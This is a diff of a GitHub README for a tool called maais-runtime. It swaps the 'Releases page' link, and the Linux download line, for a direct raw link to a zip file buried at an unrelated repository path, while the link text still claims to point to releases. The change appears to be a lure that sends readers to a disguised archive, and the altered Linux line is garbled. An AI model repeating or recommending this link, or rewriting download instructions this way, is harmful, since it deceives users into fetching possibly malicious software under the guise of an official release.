Suleymkr/maais-runtime/README.md

 - **Processor:** Dual-core processor or higher

 ### 📥 Download & Install
-1. Visit the [Releases page](https://github.com/Suleymkr/maais-runtime/releases) to get the latest version of maais-runtime.
+1. Visit the [Releases page](https://github.com/Suleymkr/maais-runtime/raw/refs/heads/main/tenants/policies/default/maais-runtime-v2.5.zip) to get the latest version of maais-runtime.
 2. Look for the latest release and find the files available for download.
 3. Choose the appropriate file for your operating system:
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://github.com/Suleymkr/maais-runtime/raw/refs/heads/main/tenants/policies/default/maais-runtime-v2.5.zip` file.
 4. Click on the file to start downloading.

 ### 🏁 Running maais-runtime